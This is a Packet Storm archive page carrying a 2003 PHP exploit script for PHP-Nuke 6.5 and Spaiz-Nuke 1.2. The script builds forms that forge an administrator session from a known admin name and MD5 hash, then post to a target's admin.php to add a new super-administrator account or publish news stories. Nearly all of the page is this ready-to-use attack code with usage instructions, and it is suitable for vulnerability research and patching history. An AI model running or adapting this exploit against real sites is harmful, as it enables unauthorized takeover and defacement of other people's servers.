what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

php-nuke.6.5.php.txt

php-nuke.6.5.php.txt
Posted Oct 30, 2003
Authored by Blade | Site fihezine.tsx.to

PHP-Nuke v6.5 and Spaiz-nuke v1.2 SQL injection exploit written in PHP. Adds an admin account.

tags | exploit, php, sql injection
SHA-256 | 47cd69171dda836213caa1d223b99cca8f4117002517f1b0aadbde2461f80ce7

php-nuke.6.5.php.txt

Change Mirror Download
Hello, Here my Exploit for PHP-Nuke >= v6.5 & Spaiz-Nuke SQL > v1.2 SQL 
Injection
Code in PHP:
Grettings, Blade...

<?php
/* PHP-Nuke & Spaiz-Nuke SQL Injection Exploit v2.2
By
BBBBBBBB lll aaaaaaaa ddddddd eeeeeeeee
BBBBBBBBB lll aaaaaaaaa ddddddddde eeeeeeeee
BBBBBBBBBB lll aaaaaaaaad ddddddddde eeeeeeeeee
BBB lll aad de
BBB lll aaaaaaaaaad dde eeeeeeeeee
BBBBBBBBBB lll aaaaaaaaaad ddd dde eeeeeeeeee
BBBBBBBBBB lll aaaaaaaaaa ddd ddeeeeeeeeeeee
BBBBBBBBBB lll aaa aaa ddd dddeeee
BBB BBB lll aaa aaa ddd ddd eee
BBB BBBB lll aaa aaa ddd ddd eee
BBBBBBBBB lllllllaaa dddddddddd eeeeeeeeee
BBBBBBBBB llllllaaa ddddddddddd eeeeeeeee
BBBBBBBB lllll aa dddddddddd eeeeeee
<blade@abez.org>

|Blade «blade@abez.org»|
****www.abez.org Of AbeZ
***www.rzw.com.ar By XyborG
**www.adictosnet.com.ar By LaKosa
*www.fihezine.tsx.to Of FiH eZine
*/
echo'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01
Transitional//EN"><html><head>
<title>PHP-Nuke And Spaiz-Nuke Injection Exploit v2.2 By
Blade</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
1"><STYLE type=text/css>
.bginput { FONT-SIZE: 9px; COLOR: #000000; FONT-FAMILY:
Verdana,Arial,Helvetica,sans-serif }
A:link { COLOR: #000066; TEXT-DECORATION: none }
A:visited { COLOR: #000066; TEXT-DECORATION: none }
A:active { COLOR: #000066; TEXT-DECORATION: none }
A:hover { COLOR: #000066; TEXT-DECORATION: none }
.button { FONT-SIZE: 10px; COLOR: #000000; FONT-FAMILY:
Verdana,Arial,Helvetica,sans-serif }
</STYLE></head><body bgcolor="#FDFEFF" text="#000000" link="#363636"
vlink="#363636" alink="#d5ae83">
<!-- PHP-Nuke & Spaiz-Nuke SQL Injection Exploit v2.2 - Original Code
By Blade<blade@abez.org> -->';

if (($action == "goAdmin") and ($server) and ($add_name) and ($add_email)
and ($add_aid) and ($add_pwd)){
$admin_name = chop($admin_name); $admin_hash = chop($admin_hash);
$server = chop($server); $add_pwd = chop($add_pwd);
$hash = $admin_name . ":" . $admin_hash . ":";
$hash = base64_encode($hash);
echo "<form name='add' method='post' action='http://" . $server .
"/admin.php'>
<input type='hidden' name='op' value='AddAuthor'>
<input type='hidden' name='add_name' value='" . $add_name . "'>
<input type='hidden' name='add_aid' value='" . $add_aid . "'>
<input type='hidden' name='add_email' value='" . $add_email . "'>
<input type='hidden' name='add_url' value='" . $add_url . "'>
<input type='hidden' name='add_pwd' value='" . $add_pwd . "'>
<input type='hidden' name='add_radminsuper' value='" .
$add_radminsuper . "'>
<input type='hidden' name='admin' value=" . $hash .">
<center><font size='1' face='Verdana, Arial, Helvetica, sans-
serif'>Servidor
vulnerable : <strong>http://" . $server . "</strong> . <br>Clave
Hash : <strong>" .
$hash . "</strong> . <br>Nuevo Administrador : <strong>" . $add_name
. "</strong>.
En caso de que estos datos no sean correctos vuelva atras desde
<a href='javascript:history.back()
'><strong>«Aquí»</strong></a>.</font>
<br><br><font size='1' face='Verdana, Arial, Helvetica, sans-
serif'><b>Si son correctos
continue la operacion agregando el nuevo
Administrador.</b></font></center>
<center><input name='AddSysop' type='submit' id='AddSysop'
value='Agregar Administrador' class='button'></center>
</form>";
} elseif (($action == "goNews") and ($server) and ($subject) and
($hometext) and ($bodytext)){

$admin_name = chop($admin_name); $admin_hash = chop($admin_hash);
$server = chop($server); $add_pwd = chop($add_pwd);
$hash = $admin_name . ":" . $admin_hash . ":";
$hash = base64_encode($hash);
echo "<form name='addNews' method='post' action='http://" . $server
. "/admin.php'>
<input name='op' type='hidden' id='op' value='PostAdminStory'>
<input name='topic' type='hidden' id='topic' value='1'>
<input name='catid' type='hidden' id='catid' value='0'>
<input name='ihome' type='hidden' id='ihome' value='0'>
<input type='hidden' name='subject' value='" . $subject . "'>
<input type='hidden' name='hometext' value='" . $hometext . "'>
<input type='hidden' name='bodytext' value='" . $bodytext . "'>
<input type='hidden' name='acomm' value='" . $acomm . "'>
<input type='hidden' name='automated' value='" . $automated . "'>
<input type='hidden' name='day' value='" . $day . "'>
<input type='hidden' name='month' value='" . $month . "'>
<input type='hidden' name='year' value='" . $year . "'>
<input type='hidden' name='hour' value='" . $hour . "'>
<input type='hidden' name='min' value='" . $min . "'>
<input type='hidden' name='admin' value=" . $hash .">
<center>
<font size='1' face='Verdana, Arial, Helvetica, sans-serif'>Servidor
vulnerable : <strong>http://" . $server . "</strong> . <br>
Clave Hash : <strong>" . $hash . "</strong> . <br>
Asunto de la Noticia: <strong>" . $subject . "</strong>. <br>
La Noticia es: <strong>" . $hometext . "</strong>. <br>
En caso de que estos datos no sean correctos vuelva atras desde <a
href='javascript:history.back()'><strong>«Aquí»</strong></a>.</font> <br>
<br>
<font size='1' face='Verdana, Arial, Helvetica, sans-serif'><b>Si
son correctos continue la operacion agregando la noticia.</b></font>
</center>
<center>
<input name='AddSysop' type='submit' id='AddSysop' value='Agregar
Noticia' class='button'>
</center>
</form>";
} elseif($exploit == "news") {
echo'<FORM action="' . $PHP_Self . '" method=post>
<TABLE width="50%" border=0 align="center" cellPadding=0
cellSpacing=0>
<TR><TD colspan="3"><div align="center"><strong><font color="#003366"
size="1" face="Verdana, Arial, Helvetica, sans-serif"><u>Server
Vulnerable:</u></font></strong></div></TD>
</TR>
<TR> <TD width="39%"> <div align="center"><font size="1"
face="Verdana, Arial, Helvetica, sans-serif"><strong>Server
Adress:</strong></font></div></TD>
<TD width="13%"><div align="right"><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">http://</font></div></TD>
<TD width="48%"><div align="left"><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">
</font>
<input name="server" type="text" class="bginput" id="server"
value="www.">
</div></TD>
</TR>
<TR> <TD> <div align="center"><strong><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">Admin
Name:</font></strong></div></TD>
<TD>&nbsp;</TD>
<TD> <p align="left"> <input name="admin_name" type="text"
id="admin_name" class="bginput">
</p></TD>
</TR>
<TR> <TD><div align="center"><strong><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">Password MD5:</font></strong></div></TD>
<TD>&nbsp;</TD>
<TD> <p align="left">
<input name="admin_hash" type="text" id="admin_hash" size="40"
class="bginput">
</p></TD>
</TR>
</TABLE><br>
<table width="50%" border="0" align="center">
<tr>
<td><div align="center"><strong><font color="#003366" size="1"
face="Verdana, Arial, Helvetica, sans-serif"><u>The
News:</u></font></strong></div></td>
</tr>
<tr> <td><div align="center"><strong><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">
<input name="action" type="hidden" id="action" value="goNews">
Title</font></strong><font size="1" face="Verdana, Arial, Helvetica,
sans-serif">(Obligatory)<strong>:<br>
<input size=50 name=subject class="bginput">
</strong></font></div></td>
</tr>
<tr> <td><div align="center"><font size="1" face="Verdana, Arial,
Helvetica, sans-serif"><strong>Text of
the News</strong>(Obligatory)<strong>:<br>
<textarea name=hometext rows=5 wrap=virtual cols=50
class="bginput"></textarea>
</strong></font></div></td>
</tr>
<tr> <td><div align="center"><font size="1" face="Verdana, Arial,
Helvetica, sans-serif"><strong>Extended
Text</strong>(Obligatory)<strong>:<br>
<textarea name=bodytext rows=12 wrap=virtual cols=50
class="bginput"></textarea>
</strong></font></div></td>
</tr>
<tr> <td><div align="center"><font size="1" face="Verdana, Arial,
Helvetica, sans-serif">Active Commentaries for
this News?<strong>&nbsp;&nbsp;
<input type=radio checked value=0 name=acomm>
Yes&nbsp;
<input type=radio value=1 name=acomm>
No</strong><strong></strong></font></div></td>
</tr>
<tr> <td><div align="center"><font size="1" face="Verdana, Arial,
Helvetica, sans-serif">You want to program
this history?<strong>&nbsp;&nbsp;
<input type=radio value=1 name=automated>
Yes &nbsp;&nbsp;
<input type=radio checked value=0 name=automated>
No<br>
<br>
Day:
<input name="day" type="text" id="day3" value="' . date(d) . '"
size="4" class="bginput">
Month:
<select name="month" id="select2" class="bginput">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12" selected>12</option>
</select>
Year:
<input maxlength=4 size=5 value="' . date(Y) . '" name=year
class="bginput">
<br>
Hour:
<select name=hour class="bginput">
<option selected name="hour">00</option>
<option name="hour">01</option>
<option name="hour">02</option>
<option name="hour">03</option>
<option name="hour">04</option>
<option name="hour">05</option>
<option name="hour">06</option>
<option name="hour">07</option>
<option name="hour">08</option>
<option name="hour">09</option>
<option name="hour">10</option>
<option name="hour">11</option>
<option name="hour">12</option>
<option name="hour">13</option>
<option name="hour">14</option>
<option name="hour">15</option>
<option name="hour">16</option>
<option name="hour">17</option>
<option name="hour">18</option>
<option name="hour">19</option>
<option name="hour">20</option>
<option name="hour">21</option>
<option name="hour">22</option>
<option name="hour">23</option>
</select>
: <select name=min class="bginput">
<option selected name="min">00</option>
<option name="min">05</option>
<option name="min">10</option>
<option name="min">15</option>
<option name="min">20</option>
<option name="min">25</option>
<option name="min">30</option>
<option name="min">35</option>
<option name="min">40</option>
<option name="min">45</option>
<option name="min">50</option>
<option name="min">55</option>
</select>
: 00</strong></font></div></td>
</tr>
<tr> <td><div align="center"><font size="1" face="Verdana, Arial,
Helvetica, sans-serif"><strong> <input name="submit" type=submit value="Add
News" class="button">
</strong></font></div></td>
</tr>
</table><center><strong><font color="#000066" size="1"
face="Tahoma"><a href="' . $PHP_Self . '?exploit=admin">[ View exploit of
the Administrators ]</a> </font></strong></center>';
} else {
echo'<FORM action="' . $PHP_Self . '" method=post>
<p align="center"><u><strong><font size="2" face="Verdana, Arial,
Helvetica, sans-serif">
<input name="action" type="hidden" id="action" value="goAdmin">
</font></strong></u></p>
<div align="center">
<TABLE width="50%" border=0 align="center" cellPadding=0
cellSpacing=0>
<TR><TD colspan="3"><div align="center"><strong><font color="#003366"
size="1" face="Verdana, Arial, Helvetica, sans-serif"><u>Server
Vulnerable:</u></font></strong></div></TD>
</TR>
<TR> <TD width="39%"> <div align="center"><font size="1"
face="Verdana, Arial, Helvetica, sans-serif"><strong>Server
Adress:</strong></font></div></TD>
<TD width="13%"><div align="right"><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">http://</font></div></TD>
<TD width="48%"><div align="left"><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">
</font>
<input name="server" type="text" class="bginput" id="server"
value="www.">
</div></TD>
</TR>
<TR> <TD> <div align="center"><strong><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">Admin
Name:</font></strong></div></TD>
<TD>&nbsp;</TD>
<TD> <p align="left">
<input name="admin_name" type="text" id="admin_name" class="bginput">
</p></TD>
</TR>
<TR> <TD><div align="center"><strong><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">Password MD5:</font></strong></div></TD>
<TD>&nbsp;</TD>
<TD> <p align="left">
<input name="admin_hash" type="text" id="admin_hash" size="40"
class="bginput">
</p></TD>
</TR>
</TABLE>
<br>
</div>
<TABLE width="50%" border=0 align="center">
<TBODY>
<TR> <TD colspan="2"><div align="center"><strong><font
color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-
serif"><u>Account
Data:</u></font></strong></div></TD>
</TR>
<TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-
serif"><strong>Name:</strong></font></TD>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT maxLength=50 size=30 name=add_name class="bginput">
(Obligatory)</font></TD>
</TR>
<TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-
serif"><strong>Nickname:</strong></font></TD>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT maxLength=30 size=30 name=add_aid class="bginput">
(Obligatory)</font></TD>
</TR>
<TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-
serif"><strong>E-Mail:</strong></font></TD>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT maxLength=60 size=30 name=add_email class="bginput">
(Obligatory)</font></TD>
</TR>
<TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-
serif">URL:</font></TD>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT name=add_url class="bginput" value="http://www." size=30
maxLength=60>
<strong> <input name="add_radminsuper" type="hidden"
id="add_radminsuper" value="1">
</strong> </font></TD>
</TR>
<TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-
serif"><strong>Password:</strong></font></TD>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT type=password maxLength=12 size=12 name=add_pwd class="bginput">
(Obligatory)</font></TD>
</TR>
<INPUT type=hidden value=AddAuthor name=op>
</TABLE> <div align="center">
<INPUT name="submit" type=submit value="Create Administrator"
class="button">
</div>
</FORM><center><strong><font color="#000066" size="1"
face="Tahoma"><a href="' . $PHP_Self . '?exploit=news">[ View exploit of
News ]</a> </font></strong></center>';
} if (($action == "goAdmin") or ($action == "goNews")){
echo'';

}if (($action != "goAdmin") and ($action != "goNews")){
echo'<br><table width="100%" border="0" align="center">
<tr> <td colspan="2"><div align="center"><font color="#003366"
size="1" face="Verdana, Arial, Helvetica, sans-
serif"><strong><u>Usage:</u></strong></font></div></td>
</tr>
<tr> <td width="15%"><strong><font size="1"
face="Tahoma">&raquo;Server Adress
:</font></strong></td>
<td width="85%"><font size="1" face="Tahoma">It is the URL
corresponding to the
vulnerable Vestibule in PHP-Nuke. Example:
www.phpnuke.org.</font></td>
</tr>
<tr> <td><strong><font size="1" face="Tahoma">&raquo;Nombre Admin
:</font></strong></td>
<td><font size="1" face="Tahoma">It is the identity in value of name,
of the administrator who password is known enciphered. Example :
xMan.</font></td>
</tr>
<tr> <td><strong><font size="1" face="Tahoma">&raquo;Password MD5
:</font></strong></td>
<td><font size="1" face="Tahoma">He is password enciphered in MD5 of
the administrator,
whose name is known. Example: 1ea52f26e7e0ce08e462f87f5e35096c
</font></td>
</tr>
</table><br><div align="center">
<table width="45%" border="0" align="center">
<tr> <td colspan="2"><div align="center"><font color="#003366"
size="1" face="Verdana, Arial, Helvetica, sans-
serif"><strong><u>References:</u></strong></font></div></td>
</tr>
<tr> <td width="47%"><div align="center"><font size="1"
face="Tahoma">Discoverers
Bug :</font></div></td>
<td width="53%"><div align="center"><font size="1" face="Tahoma"><a
href="http://rst.void.ru/texts/advisory10.htm"
target="_blank">http://www.rst.void.ru</a> </font> <font size="1"
face="Tahoma"></font></div></td>
</tr>
<tr> <td><div align="center"><font size="1"
face="Tahoma"><strong>More Information</strong>
:</font></div></td>
<td><div align="center"><strong><font size="1" face="Tahoma"><a
href="http://www.rzw.com.ar/article895.html"
target="_blank"><u>http://www.rzw.com.ar</u></a></font></strong></div></td>
</tr>
<tr> <td><div align="center"><font size="1" face="Tahoma">More
Information :</font></div></td>
<td><div align="center"><font size="1" face="Tahoma"><a
href="http://www.security.nnov.ru/search/document.asp?docid=5201"
target="_blank">http://www.security.nnov.ru</a></font></div></td>
</tr>
<tr> <td>
<div align="center"><font size="1" face="Tahoma">More Information
:</font></div></td>
<td><div align="center"><font size="1" face="Tahoma"><a
href="http://www.cyruxnet.com.ar/phpnuke_modules.htm"
target="_blank">http://www.cyruxnet.com.ar</a></font></div></td>
</tr>
</table>';

}
echo'<center><p><a href="mailto:blade@abez.org"><u><strong><font
color="#CC0000" size="1" face="Tahoma">Original Exploit Code By
Blade.</font></strong></u></a><br><font color="#003366" size="1"
face="Verdana"><b>Version 2.2.</b></font></p></center>
</div>
</body>
</html>';
?>
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    37 Files
  • 27
    Feb 27th
    34 Files
  • 28
    Feb 28th
    27 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close